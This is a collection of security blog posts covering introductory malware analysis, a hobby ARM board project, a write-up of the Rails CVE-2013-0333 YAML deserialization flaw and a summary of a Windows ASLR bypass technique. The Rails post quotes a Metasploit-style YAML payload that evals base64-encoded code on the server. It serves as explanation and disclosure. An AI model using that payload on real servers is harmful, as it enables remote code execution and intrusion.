<span style="font-size: x-small;">16309 ? S 34:22 /usr/local/bin/zmc -d /dev/video3</span><br />
<span style="font-size: x-small;">16321 ? S 128:12 /usr/local/bin/zma -m 8</span><br />
<br /><br />
Not bad for an old Pentium E5200 with 2Gb.<br />
<br />
-Mathew<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-4758575888451943302013-02-10T21:42:00.001-08:002013-02-16T10:41:50.788-08:00Malware Analysis 101 [Part 2]<div dir="ltr" style="text-align: left;" trbidi="on">
Now that we've covered the different classifications of the functionality of malicious software, made the distinction between targeting vectors, and summarized how IDS/IPS devices fit into the scheme, its time to move into analysis of malware. In case you missed it, Part 1 can be located <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-1.html">here</a>.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBAuJAjMHarDYJAm48wQeOszxUVBuZSGzQJWlQ16wTaxX8L_DmNd9Dmv59YY8fyXbZ6CIwze2diSQcLNW-gZHIB5wjah_6yIqqANxnoNJUCe7B96tM7HilGkf7fPHi0H-B25tBXd9k3XlL/s1600/Slide8.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBAuJAjMHarDYJAm48wQeOszxUVBuZSGzQJWlQ16wTaxX8L_DmNd9Dmv59YY8fyXbZ6CIwze2diSQcLNW-gZHIB5wjah_6yIqqANxnoNJUCe7B96tM7HilGkf7fPHi0H-B25tBXd9k3XlL/s320/Slide8.PNG" height="239" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.blogger.com/Image%20source:%20http://img.aegen.nl/NPH/Surgical%20Extraction.jpg">Image Source</a></td></tr>
</tbody></table>
<u>Approaches:</u><br />
<u><br /></u>
Generally, analysis of any sample can be broken down into two categories, static and dynamic which further subdivide into basic and advanced:<br />
<br />
<ul style="text-align: left;">
<li>Static</li>
<ul>
<li>Basic - Examine an executable without viewing instructions.</li>
<li>Advanced - Code analysis using disassembly tools to view Op Code.</li>
</ul>
<li>Dynamic</li>
<ul>
<li>Basic - Behavioral observation [Sandboxing].</li>
<li>Advanced - Code analysis using a debugger to manually control the flow of the program. This technique is used to understand the more complex aspects of a sample which static code analysis may be unable to provide.</li>
</ul>
</ul>
<div>
Each of the above techniques can be utilized in synchronicity of one another in order to reveal different pieces of information about a piece of software. The goal of analysis is to take these many small pieces of information from multiple sources and form a picture of the nature of the sample.</div>
<div>
<br /></div>
<div>
<u>Basic Static Analysis:</u></div>
<div>
<u><br /></u></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00_lJ05TmLS2FWnLKSyXpoFImkToX8nTMYGRCDRhnjk6P6hr7qZW5VnPiOtPVQPjl8FnFF2l3w4AdqGNIcNRMhfY1qevqBxFduFFnAy7Mv8VhNUaZ0XNYnPQx3SbwLk456Lcvfp72Fxkm/s1600/Slide9.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00_lJ05TmLS2FWnLKSyXpoFImkToX8nTMYGRCDRhnjk6P6hr7qZW5VnPiOtPVQPjl8FnFF2l3w4AdqGNIcNRMhfY1qevqBxFduFFnAy7Mv8VhNUaZ0XNYnPQx3SbwLk456Lcvfp72Fxkm/s320/Slide9.PNG" height="238" width="320" /></a></div>
<div>
From here on, it is assumed that a sample is readily apparent and available. Finding malware is a whole different can of worms, and a worthy topic for a separate blog post series (maybe in the future). </div>
<div>
<br /></div>
<div>
With a sample provided, one of the first things that can be done is AntiVirus scanning. The key is to use multiple programs and resources as this increases signature coverage. Siganture variations make a substantial difference in the rate of detection. Fortunately, instead of buying 8-10 host based antivirus products (and pitting them against each other on the same local machine) along with their accompanying subscriptions, several free web services exist which will scan a submitted sample against multiple Antivirus engines. These engines include both signature based detection and heuristic based detection. The most common/popular/wellknown example is, of course, <a href="http://virustotal.com/">Virustotal.com</a> (which has register free, public, and private API functionality).</div>
<div>
<br /></div>
<div>
Before moving on, a word about the inherent weaknesses of Antivirus software. The two types of detection mechanisms, signature based and heuristic based, have a number of shortcomings. Simple code modifications easily bypass signature based detection, and in this era of updatable malware through network (command and control) communications, the cat and mouse game has become even more fast paced. Heuristic engines have a similar weakness: they can be completely bypassed with new or unusual code. If there is no record to compare a sample against, it is impossible for a heuristic engine to categorize.</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7cWM6MuFaQHrHfswlh5hVBxgvm_DR5HFANLSg46bIZYRg0Qqsygylo3Thg2nnRKdA6O2O2ocz-RvUVJK3OvUJlMgFlUrAJd_k7y8nM0MapA7kKTi7HafnXjSufmMbb18zmKhFulYLTem/s1600/Slide10.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7cWM6MuFaQHrHfswlh5hVBxgvm_DR5HFANLSg46bIZYRg0Qqsygylo3Thg2nnRKdA6O2O2ocz-RvUVJK3OvUJlMgFlUrAJd_k7y8nM0MapA7kKTi7HafnXjSufmMbb18zmKhFulYLTem/s320/Slide10.PNG" height="241" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://www.virustotal.com/file/657a66b2709fe3d2cc441be73c9e774ad8a7a73610d8c8d3abb4e60f517a44f8/analysis/">Image Source</a></td></tr>
</tbody></table>
<div>
The image to the right was generated by using VirusTotal's main page to submit a binary retrieved from a domain listed on <a href="http://malwaredomainlist.com/">malwaredomainlist.com</a>. This file is categorized as a generic password stealer, which slots nicely into the "Infostealer" category defined in part 1 of this series. Interesting note: 9/42 AV products detected this sample as malicious, although the ones that did identifity the sample, categorized it similarly [this suggests a commonality amongst their signature designs]. The grey window shows PE32 structural information, which is something we will examine a little later. Sites like VirusTotal and AntiVirus products as a whole are not withoiut their faults: benign files can and oftentimes do trigger alerts [Example being unebootin, packed with UPX which appears suspicious, and does trigger some alerts]. Thus, solely relying on multi-scanner service like this is not going to provide enough information to make an informed decision about the overall nature of a sample. Use the information gained from services like VirusTotal or NoVirusThanks to inform your decisions, not make them for you!</div>
<div>
<br /></div>
<div>
<u>Sandboxing:</u><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKWq3MkgBmlPhNfUCNwKa2YHBV6FrLWQfg8w1pgFfwq2Tj0peQkOtWTZCB00wdoZYO_L3SsV3ijXCOR45AAlkBXNxHgm0pT3OKApmu-lvqKeoKnqt3qtYMBoH9qlBx3MxTP1bCqwqBply/s1600/Slide11.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKWq3MkgBmlPhNfUCNwKa2YHBV6FrLWQfg8w1pgFfwq2Tj0peQkOtWTZCB00wdoZYO_L3SsV3ijXCOR45AAlkBXNxHgm0pT3OKApmu-lvqKeoKnqt3qtYMBoH9qlBx3MxTP1bCqwqBply/s320/Slide11.PNG" height="239" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.blogcdn.com/downloadsquad.switched.com/media/2009/03/sandbox-asdf-sad-fa-wer-2q3.jpg">Image Source</a></td></tr>
</tbody></table>
<br />
Sandboxing is a basic, dynamic analysis technique in which a sample is run in an isolated environment: the goal being to "box off" potentially malicious activity from harming a local machine. This is generally achieved through virtualization ex: <a href="http://www.cuckoosandbox.org/">Cuckoo Sandbox</a>. Sandboxes attempt to mimic common network services in order to monitor the behavior of malware when provided network connectivity. Like antivirus services, there are a number of free, web-based services that provide this functionality if one does not have the means to setup a local environment. By far the most popular is <a href="http://threatexpert.com/">ThreatExpert</a>. ThreatExpert performs automated analysis, and is generally very useful in initial reporting.<br />
<br />
Automated sandbox analysis is not without its drawbacks and frequently will fail to give any meaningful output. Some of the issues are as follows:<br />
1) Any sample that requires command line options will not be analyzed appropriately as an automated environment has no way to pass arguments via command line in the course of executing a piece of software.<br />
2) Though network services are simulated, command and control traffic is not. Malware this is reliant on instructions from a remote host may never execute, leaving automated analysis useless.<br />
<br />
Provided the sandbox is able to execute the provided sample, a report containing system changes, network connectivity, and basic functionality if generated. ThreatExpert has the added ability to identify some malwre through AV scans, but this functionality overlaps with services previously mentioned. Like the multi-engine antivirus services the results of automated analysis should not be taken as definitive: the goal of sandboxing is to provide insight into the ways in which a sample may attempt to manipulate a host.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA8yPJmElwurcs7HfQGuiqQmfmwrJM2JLt5OpYhzOu2F_fvNpFst5O4oVY4LsSyqkhK8qpzvCXgWrcz9bbwBi3Zi_gRa-PQbPUksv2l34V0qe3QLP_ajqC0Nt9XchnAlDgfanVKju_SMMr/s1600/Slide12.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA8yPJmElwurcs7HfQGuiqQmfmwrJM2JLt5OpYhzOu2F_fvNpFst5O4oVY4LsSyqkhK8qpzvCXgWrcz9bbwBi3Zi_gRa-PQbPUksv2l34V0qe3QLP_ajqC0Nt9XchnAlDgfanVKju_SMMr/s320/Slide12.PNG" height="239" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://threatexpert.com/report.aspx?md5=d328f6557605a9290b1d3ffcde38378c">Report Source</a></td></tr>
</tbody></table>
Here is an example report for a sample submitted to ThreatExpert in 2010. Though 2010 may be a reltively ancient date at this point, it is a good demonstration of information provided by ThreatExpert post-analysis. You can see basic summary information of the submitted sample including hash, file size Aliases as identified by AV products and Time/Date Submitted. Of more interest is the "What's Been Found Field" which summarizes the activity which took place during the run time in an easily readable and understandable form. This information is very useful for understanding the capabilities of a sample, and can provide some insight into the Function Calls that you may see further along in the analysis process. The next section contains File System changes: files added, removed and modified and their names + directories, potentially useful for signature development or manual removal. The final section of note is the Network activity summary. Here you can see that a file was downloaded, potentially provided yet another sample for analysis in the future. You may also be able to infer that the sample submitted has some downloader Trojan Functionality, and is likely to making Windows API calls in order to download this file.<br />
<br />
Stay Tuned for Part 3!<br />
[Hashing, PE Headers, Linked Libraries and Functions!]</div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-86934752369736539882013-02-08T05:00:00.001-08:002013-02-08T05:00:23.814-08:00Newest contributer to this blogHello followers. I am a new edition to this blog. My topics will be far and wide due to that being the focus of my interests.<br />
<br />
My current project is porting ArchLinux to my newest embedded device, the oDroid. I have a Raspberry Pi, I wanted something with a bit more processing capabilities and discovered the oDroid. Great device.<br />
<br />
The status of this project is, as far as I can tell the system is running but no video output from the HDMI output (framebuffer only). I have a 1.7v UART adapter on the way so that I can get the console up and figure out the video issue.<br />
<br />
As of last night I've completed setting up a VM on my server that is dedicated to distcc (distributed c compiler) to assist in compiling software on the oDroid. Not that the oDroid is slow but just because time is progress.<br />
<br />
In case you've not seen the oDroid, it packs a Cortex A9 quad-core ARM7 at 1.7GHz, 2Gb memory and Mali-400 GPU. A couple other things that make this stand out compared to the RPi is that this has 6xUSB, Audio in, 8-bit eMMC memory option and then a category 10 SD reader. I did spring for the 16Gb eMMC option.<br />
<br />
I now have the eMMC running Android on it, one SD card with my ArchLinux progress and a second SD card with Ubuntu. I did manage to get GNUradio compiled under Ubuntu and have been using it with a RTL-SDR receiver.<br />
<br />
-MathewUnknownnoreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-61532160061491058882013-02-06T19:03:00.001-08:002013-02-06T21:11:53.732-08:00Malware Analysis 101 [Part 1]<div dir="ltr" style="text-align: left;" trbidi="on">
Back in July of 2012 at the Rhode Island OWASP and again in September of 2012 at "The Brain Tank", I was fortunate enough to be allocated 50 minutes during which to speak about a sort of side hobby that overlaps into my normal workflow. Its a topic that really inspired me to look into the Info-Sec industry as a career: that topic is Malware. I find evil things highly entertaining, and what is more sinister than malicious software?<br />
<br />
The goal of my original presentation was to provide an overview of basic techniques I use on a daily basis in order to inform my decision making process. Within 15 minutes of receiving a sample (regardless of the form it arrives in!) an analyst needs to be able to determine what action to take. The desired outcome is to categorize the sample as:<br />
<div style="text-align: left;">
1) Benign</div>
<div style="text-align: left;">
2) Suspicious</div>
<div style="text-align: left;">
3) Malicious</div>
<div style="text-align: left;">
With that in mind, I am going to go ahead and skip the first 2 slides, which consisted of an Introduction and an About Me section, and hop right into the meat of my presentation. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Note: Some of my slides contain 3rd party graphics or images. These will all be linked below the image of the slide.</div>
<div style="text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div style="text-align: left;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYLDxB5GNPf2RzMKDBLCcrjBAUfmG1CCrlLQu1CMTzJitQmGMoLxyfEcKllYKEo6ymh0fBcjO3v9Nh4TByBAHb4pJOLcjSBfVUdFUTCF8Zzn94xgLwQa9cOl33mMpWQvSwgAzB_q5F_iNn/s1600/Slide3.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYLDxB5GNPf2RzMKDBLCcrjBAUfmG1CCrlLQu1CMTzJitQmGMoLxyfEcKllYKEo6ymh0fBcjO3v9Nh4TByBAHb4pJOLcjSBfVUdFUTCF8Zzn94xgLwQa9cOl33mMpWQvSwgAzB_q5F_iNn/s320/Slide3.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.versuscyberpunkhorrors.com/2012/04/digital-fears-of-new-world.html">Image Source</a></td></tr>
</tbody></table>
<u>Types of Malware:</u><br />
<br />
Subdividing different "species" of malware is a fairly difficult task as there are a significant numbers of samples which exhibit a large range of capabilities. With that in mind, a generic outline can be presented as the following:<br />
<br />
<ul style="text-align: left;">
<li>Backdoor - Installed onto a host to allow access. Usually, an attacker can connect with little to no authentication to an environment in which he or she may execute commands.</li>
<li>Botnet - Similar to a backdoor, however each machine infected with the same malware receives the same set of instructions from a command and control server (C2).</li>
<li>Downloader - Code that allows the download of additional malicious code. Generally a "gateway" type of malware installed after an attacker first gains access. This behavior is often observed in Exploit Kits (Exploit -> Downloader Trojan -> Trojan retrieves botnet or Infostealer Payload).</li>
<li>Rootkit/Bootkit - Conceals the existence of itself and other malicious code in an attempt to provide some resiliency and persistence. Generally malware in this category spans into backdoor functionality.</li>
<li>Worm/Virus - Malicious code that can copy itself and propagate. In ye olde times this was used for DOS/Notoriety. Current functionality appears to be financially motivated; worms are often utilized to gain access to machines to send spam.</li>
<li>Infostealer [Trojan] - Collects information and exfiltrates it. Usually includes sniffers, hash collection, and keyloggers. A prominent example is the Zeus family of malware. </li>
</ul>
<div>
These categories are NOT mutually exclusive!</div>
<div>
<br /></div>
<div>
<u>Modern Malware:</u></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAeP6gwKEiHJ5CtjFDokkJhl5ZIT2BDLxwVnfdNEPJQhwpkte4TlM3_gu6MFNCYal_Gju24eQULRFPTWr6jaaVePtWQyvaaAYrdBfFHnXlMiWQU1ZoyFtmeFZzRRkW25IRh7maF-BUatuL/s1600/Slide5.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAeP6gwKEiHJ5CtjFDokkJhl5ZIT2BDLxwVnfdNEPJQhwpkte4TlM3_gu6MFNCYal_Gju24eQULRFPTWr6jaaVePtWQyvaaAYrdBfFHnXlMiWQU1ZoyFtmeFZzRRkW25IRh7maF-BUatuL/s320/Slide5.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://t0.gstatic.com/images?q=tbn:ANd9GcTD2e2taiseudobJINjUkBpNxrNdPFCrH-3zLRUqr50jw05XxJWyJcmGUB7">Image Source</a></td></tr>
</tbody></table>
<div>
<br /></div>
<br />
Malicious software is the primary vector for the majority of intrusions. It is easiest to break down the "styles" of attacks into two categories:<br />
<br />
<ol style="text-align: left;">
<li>Targeted - The result of social engineering techniques like spear phishing. This is the "precision strike" approach.</li>
<li>Untargeted - This is commonly described as drive-by exploitation, as observed in Exploit Kits. This is the "shotgun" approach.</li>
</ol>
<div>
A key part of modern malware (actually, what makes it modern) is the inclusion of network communication components. In olden times, malware did not always utilize a host's internet connectivity to receive commands or update; this provided for autonomous, but dumb, software. Nowadays, it is exceedingly common for malicious software to include some type of network functionality. Malware authors have incorporated a number of techniques for communication ranging from the basic (HTTP GET/POST requests over plain text) to the advanced (Custom binary protocols with encryption). No matter the technique used, the general functionality remains the same: network connectivity allows for data exfiltration, remote command execution, and updating of core malware components.</div>
<div>
<br /></div>
<div>
<u>Network Detection:</u></div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzn0KUB2REhOnRsfNrFj0SLB3yF9AgqhJE1WDk4yD2Dcx04uOdjwQT4XSMxHJfmHWfCuQDtAf2TOT7c092ZsyDJch1vuTuXtRLtcW8TfwaJrAC5ezL7sZYWM3hG5k96cF02A459ofQnFVk/s1600/Slide6.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzn0KUB2REhOnRsfNrFj0SLB3yF9AgqhJE1WDk4yD2Dcx04uOdjwQT4XSMxHJfmHWfCuQDtAf2TOT7c092ZsyDJch1vuTuXtRLtcW8TfwaJrAC5ezL7sZYWM3hG5k96cF02A459ofQnFVk/s320/Slide6.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.ma-tech.co.uk/images/Virus-Detected.jpg">Image Source</a></td></tr>
</tbody></table>
<div>
With the rise of network connectivity of malware, IDS/IPS platforms have become a popular solution for detecting threats. These devices, however, are not without their limits. Some of the pitfalls of IDS/IPS devices are:</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li>Analysis of traffic in context is extremely difficult to automate. Protocols and formatting within protocols make the context of traffic of paramount importance. For example, it is common to see IP-> TCP -> HTTP -> GZIP -> JavaScript in the same stream. If the IDS/IPS is unable to examine the JavaScript, it could miss potentially malicious payloads. The good news is that this is a well known short coming of this type of technology and developers are constantly adding features to make their platforms increasingly protocol aware.</li>
<li>Related to the issue of contextual analysis, IDS/IPS make decisions on one packet at a time. Evasion/Insertion techniques or malformed packets can cause unintended results.</li>
</ul>
<div>
The introduction of target-based analysis (Snort's Frag3 Preprocessor) allows the IDS/IPS to "know" how devices will handle ambiguity. Though this is a step in the right direction, human analysis is still required to compensate for the shortcomings of this technology. Unusual or one-off scenarios can still confuse IDS/IPS. </div>
</div>
<div>
<br /></div>
<div>
IDS have come a long way since their days of "Network Grep", but they are certainly not foolproof.</div>
<div>
<br /></div>
<div>
<u>Signature Types:</u></div>
<div>
<u><br /></u></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlGxiGzh6ySzDPLHG1yiW2QeF0QfOpvkSd-rgL0PRhXkw1IvFtmHNB_g6Nz2246bYOiqEAwGw-SAGlheAk8wPxpOSEeUWyIJ5JPvy-WFZ73kwxhun9yfwJC0kzdZPyBjFMXyuFgT4Lar3/s1600/Slide7.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlGxiGzh6ySzDPLHG1yiW2QeF0QfOpvkSd-rgL0PRhXkw1IvFtmHNB_g6Nz2246bYOiqEAwGw-SAGlheAk8wPxpOSEeUWyIJ5JPvy-WFZ73kwxhun9yfwJC0kzdZPyBjFMXyuFgT4Lar3/s320/Slide7.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<div>
Several types of signatures are used by IDS/IPS platforms to detect the activity of malicious software </div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li>Phoning Home - The goal of these types of signatures is to detect outbound connection attempts to a malicious host. This is occasionally done by inference: "Oh hey, this internal host is making tons of HTTP POST requests to a host in Kazakhstan That probably isn't suspicious." Other signatures in this category focus on the specific formatting of requests. A recent example is the Redkit Exploit Kit utilizing a predictable .jar file name. This isn't foolproof, as services like Twitter/Facebook/Google have been used to mask command and control communications within benign websites.</li>
<li>Third-Party communications - Malware may not necessarily check in with a C2 first. In the case of several versions of the "ZeroAccess" Trojan, the legitimate host "fling(dot)com" is queried in an attempt to geo-locate the IP of the infected host. This can be an early indicator of a compromised machine.</li>
<li>Inference - Like the name suggests, this type of signature is essentially "reading into" traffic and making a decision. This is commonly implemented in the form of DNS lookups for malicious domains. This traffic may be from a local host to an internal DNS server, however the domain being requested has been identified as malicious and thus results in an alert. Another example is the TDL3/4 class of Trojans which have consistently identifiable certificate exchanges.</li>
</ol>
<div>
Stay tuned for Part 2: Approaches to Analysis!</div>
</div>
<div>
<u><br /></u></div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com2tag:blogger.com,1999:blog-5498034097070054412.post-75478870191178009702013-01-28T14:27:00.002-08:002013-01-29T23:30:27.417-08:00CVE-2013-0333 - Ruby On Rails: JSON Parser Derailed<div dir="ltr" style="text-align: left;" trbidi="on">
Yet another vulnerability Ruby on Rails vulnerability has been patched today.<br />
Official(ish) notification here: <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo">Google Groups: Ruby on Rails Security</a><br />
<br />
This time, instead of XML being used to pass raw POST data as an argument to the backend, the problem lies in the JSON (which was originally considered the work around for CVE 2013-0156) parser which transforms JSON into YAML, which is in turn passed through a YAML parser. This leads to a very similar attack, abusing<span style="color: lime;"> </span><span style="color: lime; font-family: Consolas, Liberation Mono, Courier, monospace;"><span style="font-size: 12px; line-height: 16px; white-space: pre;">!ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection,</span></span> that was previously thought patched in ROR 2.3.x and 3.0.x.<br />
<br />
Here's a look at the problem (<span style="color: lime;">activesupport/lib/active_support/json/backends/yaml.rb</span>)<br />
<br />
<br />
<blockquote class="tr_bq">
# Parses a JSON string or IO and converts it into an object<br />
def decode(json) <span class="Apple-tab-span" style="white-space: pre;"> </span> if json.respond_to?(:read) <span class="Apple-tab-span" style="white-space: pre;"> </span> json = json.read <span class="Apple-tab-span" style="white-space: pre;"> </span> end<span class="Apple-tab-span" style="white-space: pre;"> </span> <span class="Apple-tab-span" style="white-space: pre;"> </span> <b>YAML.load(convert_json_to_yaml(json))</b> rescue *EXCEPTIONS => e<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span> raise ParseError, "Invalid JSON string: '%s'" % json</blockquote>
<br />
<br />
The bold part is important. This is what further encodes arbitrary user input into a format that supports serialization and deserialization of arbitrary data types by the Yaml parser. Once again, this includes reserved Symbols and arbitrary objects.However, instead of a combination of XML and Yaml, JSON converted into Yaml is the culprit.<br />
<br />
The fix replaces the Yaml backend (<span style="color: lime;">activesupport/lib/active_support/json/backends/yaml.rb</span>), which allowed single quoted ('foo') strings, with OkJson (<span style="color: lime;">activesupport/lib/active_support/json/backends/okjson.rb</span>). The fixed versions are identified as: 3.0.20 and 2.3.16. Due to the similarity to the previous vulnerabilities earlier this month, this is likely to quickly be utilized in the wild. Expect probes soon.<br />
<br />
Update 1: POC here: <a href="https://gist.github.com/4660248">https://gist.github.com/4660248</a><br />
<br />
<blockquote class="tr_bq">
<span style="color: lime;">encoded_yaml = yaml.gsub(':','\u003a') </span></blockquote>
[Clever!]<br />
<br />
Update 2: Sample of Metasploit Module Code, based on the previous XML/YAML Vuln<br />
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><blockquote>
<span class="st0" style="color: #996600;">!ruby/hash<span class="es0" style="color: #000099;">\:</span>ActionDispatch<span class="es0" style="color: #000099;">\:</span><span class="es0" style="color: #000099;">\:</span>Routing<span class="es0" style="color: #000099;">\:</span><span class="es0" style="color: #000099;">\:</span>RouteSet<span class="es0" style="color: #000099;">\:</span><span class="es0" style="color: #000099;">\:</span>NamedRouteCollection<span class="es0" style="color: #000099;">\n</span>"</span> <span class="sy0" style="color: #006600; font-weight: bold;">+</span> <span class="st0" style="color: #996600;">"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; "</span> <span class="sy0" style="color: #006600; font-weight: bold;">+</span> <span class="st0" style="color: #996600;">"eval(%[#{code}].unpack(%[m0])[0]);' "</span> <span class="sy0" style="color: #006600; font-weight: bold;">+</span> <span class="st0" style="color: #996600;">"<span class="es0" style="color: #000099;">\:</span> !ruby/object:OpenStruct<span class="es0" style="color: #000099;">\n</span> table<span class="es0" style="color: #000099;">\:</span><span class="es0" style="color: #000099;">\n</span> <span class="es0" style="color: #000099;">\:</span>defaults<span class="es0" style="color: #000099;">\:</span> {}<span class="es0" style="color: #000099;">\n</span>"</span> yaml.<span class="kw3" style="color: #cc0066; font-weight: bold;">gsub</span><span class="br0" style="color: #006600; font-weight: bold;">(</span><span class="st0" style="color: #996600;">':'</span>,<span class="st0" style="color: #996600;">'<span class="es0" style="color: #000099;">\u</span>003a'</span><span class="br0" style="color: #006600; font-weight: bold;">)</span></blockquote>
</li>
</ol>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-71654717239398356362013-01-26T15:03:00.000-08:002013-01-26T17:36:11.132-08:00Windows 7/8 ASLR - Not so Much<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This commentary is based on the work published and performed by "Kingcope". The original text and PoCs are located here: <a href="http://kingcope.wordpress.com/2013/01/24/attacking-the-windows-78-address-space-randomization/">http://kingcope.wordpress.com/2013/01/24/attacking-the-windows-78-address-space-randomization/</a><br />
<br />
The inclusion of memory protections in Windows 7 (and now Windows 8) was touted as a means to defeat exploitation attempts by:<br />
<br />
1) Preventing code execution on the stack [<a href="http://en.wikipedia.org/wiki/Data_Execution_Prevention">DEP</a>]<br />
2) Randomizing the memory offsets of Programs (and associated DLLs) [<a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR</a>].<br />
<br />
While bypassing DEP has been relatively well documented by multiple sources in numerous locations [see: <a href="https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/">ROP Chains</a>], ASLR has proven a tougher nut to crack. Randomization of the memory space forces an exploit writer to try and predict where in memory to point an instruction pointer that he or she has gained control over. The goal being, of course, to point to an area of memory which contains the writer's arbitrary code.<br />
<br />
Current methods for "beating" ASLR include: utilizing browser memory leak bugs or relying on older DLLs that do not have their image bases randomized. Unfortunately, knowledge of a particular memory leak or reliance on outdated third party software are niche* scenarios culminating in the creation of an idyllic attack surface.<br />
<br />
That's where Kingcope's research comes in!<br />
<br />
The theory presented is fairly simple: DLLs are loaded into memory space as long as there is space available. If no memory (or very little) is availble, the DLL will be put into the remaining memory. But how does an attacker create a situation in which there is no or minimal (and thus predictable!) memory available in which to load a DLL? By utilizing JavaScript in a target's browser to fill memory to the allocated boundary.** When the allocated boundary is hit, a JavaScript exception is raised which causes the exception handler to execute additional code that frees small chunks of memory. The goal is to slowly free small heap blocks and try to add the DLL(s) into memory; when the DLL is successfully loaded, the region (address space) is fixed and predictable, allowing an exploit writer to point an instruction pointer at a fixed location on the heap.<br />
<br />
In his example, Kingcope utilizes the Windows Media Player control ActiveX object to illustrate how the previously described method of abusing JavaScript's exception handler can be used to load a DLL into predictable address space.<br />
<br />
